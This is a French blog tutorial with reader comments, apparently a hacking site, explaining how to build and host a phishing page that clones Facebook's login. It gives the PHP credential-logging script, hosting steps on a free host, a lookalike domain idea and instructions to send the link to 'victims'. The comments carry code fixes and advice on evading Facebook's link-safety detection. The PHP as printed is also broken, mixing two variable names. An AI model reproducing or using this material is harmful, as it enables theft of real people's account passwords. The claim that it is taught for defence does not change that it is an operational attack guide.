Comment créer une page de phishing facebook pour hacker les mots de passe

Création facile d’une page de phishing, exemple de page pour le phishing des mots de passe facebook.

Page de phishing facebook


Le phishing est une pratique du piratage informatique, qui consiste à cloner une page web dans le seul but de recueillir les informations des utilisateurs. Ces informations peuvent être les logins dans les forums, les informations bancaires, le mots de passes des comptes paypal, et dans notre cas, la page de phishing de mot de passe facebook. Serte facebook engage des milliers de personnes pour la sécurisation des comptes des utilisateurs, mais le social engineering se concentre sur la victime et joue sur sa psychologie. Tout comme le spoofing mail, le physhing reste l’une des techniques les plus utilisées par les hackeurs débutants et confirmés.


Les étapes de création d’une page de phishing facebook

étape 1 : aller à la page d’accueil de facebook et faire un click droit de la souris, vous verrez l’option code source de la page

Une de phishing à cloner

2   copier le code source et le coller dans un éditeur de texte comme bloc-note.

dans votre éditeur de texte, faites CTR + F et dans la barre de recherche qui apparait, taper le mot Action= .
La page suivante illustre la procédure.

Code source de notre page de phishing facebook

4 remplacer tout le lien qui se trouve ” entre ces guillemet ” par post.php .j’explique à quoi cela va servir concrètement.
Lorsque que vous entrez vos informations de connexion Facebook, et que vous cliquez sur connexion, le traitement se fait  via post.php. On a donc action=”post.php” .


5 Enrégistrez votre code modifié sur l’extension html
 Si vous avez juste les bases en programmation web, vous comprendrez facilement.

Enrégistrement de la page facebook en index.html

 6 Ouvrir à nouveau votre éditeur de texte copier coller le code en dessous.

<?php
header (‘Location: http://www.facebook.com/’);
$handle=fopen(“utilisateurs.txt”, “a”);
foreach($_POST as $variable=>$value);{
fwrite($handle, $variable);
fwrite($handler, “=”);
 fwrite($handler, “$value”);
fwrite($handler, “rn”);

fwrite($handler, “rn”);
fclose($handle);
exit;
}
 ?>

7  Enregistrez le document sous l’extion php: post.php
C’est l’adresse de l’attribut action du premier document index.html.
 Vous avez maintenant deux fichiers, le premier index.html et le second post.php.

 8 Héberger vos deux fichier dans votre espace d’hébergement ou chez un hébergeur gratuit.
Chez 00webhost, la procédure est la suivante:

-Création de compte gratuit

Hébergement d'une page de phishing

 – Accédez dans votre panneau de contrôle, à partir de là, vous verrez file manager.

Hébergement d'une page de phishing 00webhost


 
 Cliquez dessus, et une fenêtre pop up apparait, à l’intérieur, cherchez et ouvrez public_html.

Effacer le fichier default.php, après avoir ajouté vos deux fichiers crées au cours du tutos: index.html et post.php

Phishing tutoriel

10 Ouvrez le lien de votre page index.html, vous constaterez que la page est identique à celle de facebook. La seulement différence se trouve au niveau du lien. Comme 00webhost donne plutôt des sous-noms de domaine gratuits, la possibilité de personnaliser votre lien est limité, car il sera sous la forme: monexemple.netne.net.
monexemple sera remplace par votre nom de choix, expemle facelook.netne.net .
 Copiez l’url de votre page index.html et envoyez la à vos victimes. Dès qu’ils se connectent, vous pouvez ainsi récupérer leurs Mots de passe Facebook

11 Récupération du mot de passe de vos victimes 

Ouvrez votre espace hébergement 00webhost=>File Manager => Public_html, là vous trouverez un nouveau fichier créé qui sera nommé utilisateurs.txt 
Les noms d’utilisateurs et mots de passe serons présent dans ce fichier, mais pour qu’il soit créé, il faut qu’au moins une victime ait entré ses informations. Dans l’exemple en dessous, le fichier utilisateurs était plutôt créé sur le nom de usernames.txt( qui signifie toujours noms des utilisateurs).

Phishing tutoriel suite

  
 Si vous avez respecté toutes les étapes normalement, votre première page de phishing facebook serat créé et prête à l’emploie.
Pour les Anglophones qui aimerait la version anglaise, c’est par là le hacking facebook grâce au phishing.

 Je rappel qu’ils existe plusieurs autres méthodes que vous pourriez découvrir : Autres astuces pour  hacker un compte facebook sans logiciel

Le but des tutoriels de  Hacking , est de vous instruire à fin de mieux vous défendre et non de vous inciter à nuire à autrui.

Des questions ou suggestions, laissez les en commentaire et je me ferais le grand plaisir de vous répondre. 
 


CATÉGORIES
Partager ceci

COMMENTAIRES

Basiques (49)
  • comment-avatar

    La page de phishing ne march pas. on signal des erreurs. cordialement

  • comment-avatar

    BOonjour et merci pour l'astuce mais est ce possible avec un autre hebergeur ?

  • comment-avatar
    Anonyme 1 année

    Bonjour.

    Pour héberger le fichier vous vous expliquez avec l'ancienne version du site. Est-ce que ce serais possible de nous expliquer avec la version actuelle s'il vous plait?

    Merci d'avance.

    Cordialement

  • comment-avatar

    Avec la version actuelle la logique reste la même. Même s'il y a des changements au niveau du Backoffice, héberger la page de phishing facebook suit le même principe que dans le tutoriel.

  • comment-avatar

    Salut Sylvain,

    Vérifie que toutes les étapes sont bien respectées. Les codes de phishing facebook doivent être recopiés de façon identique.

  • comment-avatar

    Le plus important est d'héberger la page de phishing facebook et pouvoir récupérer les infos après. Donc quelque soit l'hébergeur, ça devrais aller.

  • comment-avatar

    Hello,
    Merci pour ce tuto mais le site d'hébergement ne me laisse plus me connecter pour abus.. pourrais tu m'aider ?
    As tu une page phising prête à l'emploi pour éventuellement m'aider à la récupération ? :))
    Cordialement

  • comment-avatar

    Bonjour,
    Le site d'hébergement ne me laisse plus me connecter pour avis.. 🙁
    Help….
    Sinon aurais tu simplement une page phising prête à l'emploi, juste Pour une fois, Et me récupérer un truc ? :)))

  • comment-avatar

    Une page de phishing facebook prête à l'emploi, je n'en dispose pas malheureusement. Sauf celle que j'ai autrefois utilisé.

  • comment-avatar
    Anonyme 12 mois

    Le fichier utilisateurs.txt ne se crée pas une soluce ?

  • comment-avatar

    Le fichier utilisateur ne se crée pas

  • comment-avatar

    Si ce fichier ne se cré pas, cela signifie tout simplement que personne n'a pas encore entré ses informations de connexion Facebook. Et rassure-toi que les différentes pages nécessaires au phishing Facebook ont été bien créé.

  • comment-avatar

    Bonjour j'ai beaucoup de mal stp peut tu m'aider memé sur skype ou en video stp
    Récompense a l'appui ….

  • comment-avatar

    Salut Rayan Malakoff,

    Tu es bloqué à quel niveau? As-tu au moins suivit la procédure exacte comme détaillé dans le tutoriel?

  • comment-avatar

    Quand tu dis : Effacer le fichier default.php, après avoir ajouté vos deux fichiers crées au cours du tutos: index.html et post.php

    Je ne vois pas de fichier default.php
    Et je n'arrive pas a ajouté de dossier
    stp donne moi les procédures

  • comment-avatar

    LE fichier default.php se trouve à la racine de ton espace d'hébergement web. L'hébergeur doit disposer d'un client manager. Regarde bien.

  • comment-avatar

    Parse error: syntax error, unexpected '' (T_NS_SEPARATOR), expecting ',' or ')' in /storage/ssd2/684/2326684/public_html/post.php on line 10
    ya une erreur dans le fichier php ?

  • comment-avatar
  • comment-avatar

    La bonne page est:
    $value);{
    fwrite($handle, $variable);
    fwrite($handler, "=");
    fwrite($handler, "$value");
    fwrite($handler, "rn");
    }
    fwrite($handler, "rn");
    fclose($handle);
    exit;
    ?>

  • comment-avatar

    La bonne page est d'après ma correction:
    $value);{
    fwrite($handle, $variable);
    fwrite($handler, "=");
    fwrite($handler, "$value");
    fwrite($handler, "rn");
    }
    fwrite($handler, "rn");
    fclose($handle);
    exit;
    ?>

  • comment-avatar

    Merci pour ta contribution Julien et à bientôt.

  • comment-avatar

    bonsoir MS MOSS j ai un soucis svp je ne comprend pas une parti << 6: Ouvrir à nouveau votre éditeur de texte copier coller le code en dessous >> on colle en dessous de l autre code ou on ne melange pas?

  • comment-avatar

    bonsoir MS MOSS j ai un soucis svp je ne comprend pas une parti << 6: Ouvrir à nouveau votre éditeur de texte copier coller le code en dessous >> on colle en dessous de l autre code ou on ne melange pas?

  • comment-avatar

    bonsoir et merci pour le tuto. mais quand tu veux partager l'adresse, facebook te dit: Le contenu que vous essayez de partager contient un lien que nos systèmes de sécurité ont détecté comme dangereux

  • comment-avatar

    bonsoir merci bien pour le tuto. mais quand tu envois l'adresse, facebook refuse en disant: Le contenu que vous essayez de partager contient un lien que nos systèmes de sécurité ont détecté comme dangereux

  • comment-avatar

    C'est un nouveau fichier texte qu'il faut ouvrir ta bloc note. Le premier était un document htlm. Celui est écrit en php, car pour l'enregistrer il faudra ajour l'extension ".php".

  • comment-avatar

    Effectivement des systèmes de sécurité supplémentaires sont mis en place pour détecter des noms de domaines et liens faisant allusion à Facebook. Dans le fichier php, enlève l'adresse de redirection vers le vrai Facebook un fois que la victime aurait entré ses infos.

  • comment-avatar

    bonjour merci de noter que le fichier utilisateur.txt est bien crée mais je trouve pas le login et le mot de passe ; je trouve juste ce message 'prefill_typeprefill_typeskstampskstampskstamp'

  • comment-avatar
    Anonyme 7 mois

    je ne trouve pas utilisateurs.txt alors que la page a étais utiliser pouvez-vous m'aider svp

  • comment-avatar

    Le paquet téléchargé ne contient pas le fichier text, c'est ça ?

  • comment-avatar

    bonjour moi c est le meme pb j ai essayer avec une fausse adresse mais mais sa ne marche pas avez vous une solution

  • comment-avatar

    bonjour moi c'est la meme histoire j ai tester avec un faux compte masisa ne se crée pas povezvous m aider

  • comment-avatar

    oui j'ai cela aussi help pls =)

  • comment-avatar

    oui c'est cela comment pouvez vous m'aidez, j'ai son probleme

  • comment-avatar

    Petit probleme, le utilisateur.txt ne pop up pas :/

  • comment-avatar

    Petit problême need help, il n'y a pas de utilisateur.txt qui ce crée …

  • comment-avatar

    Soyez plus explicite.

  • comment-avatar
    Anonyme 6 mois

    pareil pour moi la page ne m affiche pas le document utilisateur.txt

  • comment-avatar
    Anonyme 6 mois

    lorsque que je test la page la fausse page facebook me dit que une erreur c est produite pk ?

  • comment-avatar

    L'erreur peut provenir de chez l'hébergeur du fichier.

  • comment-avatar

    salut, moi aussi je n'arrive pas a partager l'adresse car facebook me dit: Le contenu que vous essayez de partager contient un lien que nos systèmes de sécurité ont détecté comme dangereux.
    Mais j'ai pas bien compris votre explication
    Je suis allez dans le fichier php et j'ai suprimer l'adresse http://www.facebook.com.
    quand même facebook bloc l'envoie du lien.

  • comment-avatar
    Anonyme 5 mois

    pourriez vous me dire que devrais-je faire pour remédier a mon erreur?

  • comment-avatar
    Anonyme 5 mois

    j'ai tous bien respecter mais le fichier pour recuperer le mdp ne se crée pas alors que des tentatives de connections ont deja été effectuer

  • comment-avatar

    jai tout fait, mais quand je entre des informations pour tester, ca marce mais quand je vais dans file manager, je ne trouve pas utilisateurs.txt

  • comment-avatar

    De plus en plus d'hébergeurs mettent en place des programmes de détection des pages de phishing. Lequel utilise-tu ?

  • comment-avatar

    Allo, quand je colle le code source a bloc note sa fige car le code est beaucoup trops gros

  • comment-avatar
    Anonyme 5 mois

    ca me marque skstamp dans le fichier texte tout le temps

  • comment-avatar
    Anonyme 5 mois

    le fichier texte se cree mais ca me marque dedans had password prefillehad passeword prefile que doije faire

  • comment-avatar

    Salut MR MOSS

    ((( Copiez l'url de votre page index.html et envoyez la à vos victimes. Dès qu'ils se connectent, vous pouvez ainsi récupérer leurs Mots de passe Facebook. ))))

    faut necessairement l'adresse mail du destinaire? ou juste le pseudo de la page facebook est suffisant?

  • Disqus ( )